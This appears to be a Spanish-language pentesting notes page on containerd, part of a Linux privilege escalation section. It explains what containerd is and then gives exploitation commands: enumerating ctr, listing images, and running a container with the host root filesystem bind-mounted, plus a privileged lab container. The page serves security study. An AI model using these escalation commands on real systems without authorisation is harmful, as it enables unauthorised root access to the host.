Containerd

Linux privilege Escalation

containerd: Este entorno de ejecución principal para contenedores, encargado de la gestión integral del ciclo de vida de un contenedor, implica la gestión de la transferencia y el almacenamiento de imágenes, además de supervisar la ejecución, la monitorización y la conexión en red de los contenedores. Se profundiza en la información sobre containerd. Containerd se desarrolló específicamente para satisfacer las necesidades de plataformas de contenedores como Docker y Kubernetes, entre otras. Su objetivo es simplificar la ejecución de contenedores en diversos sistemas operativos, como Linux, Windows, Solaris y más, abstrayendo la funcionalidad y las llamadas al sistema específicas de cada sistema operativo. El objetivo de Containerd es incluir únicamente las características esenciales que requieren sus usuarios, procurando omitir componentes innecesarios. Sin embargo, lograr este objetivo por completo se reconoce como un desafío.

Una decisión clave de diseño es que Containerd no gestiona las redes. Las redes se consideran un elemento crítico en los sistemas distribuidos, con complejidades como las redes definidas por software (SDN) y el descubrimiento de servicios que varían significativamente de una plataforma a otra. Por lo tanto, Containerd deja la gestión de los aspectos de red en manos de las plataformas que soporta.

Si bien Docker utiliza Containerd para ejecutar contenedores, es importante tener en cuenta que Containerd solo admite un subconjunto de sus funcionalidades. En concreto, Containerd carece de las capacidades de gestión de red presentes en Docker y no admite la creación directa de enjambres Docker. Esta distinción resalta el rol enfocado de Containerd como entorno de ejecución de contenedores, delegando funcionalidades más especializadas a las plataformas con las que se integra.

Explotación

  • hacemos enumeración para comprobar si containerd esta instalado en el sistema

which ctr

podemos listar las imágenes

ctr image list

luego de eso corre alguna de esas imágenes aplicando monturas del folder de root

ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash

Contruye tu laboratorio de practica :

ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
PreviousDocker Escape / breakoutNextCapabilitie Abuse

Last updated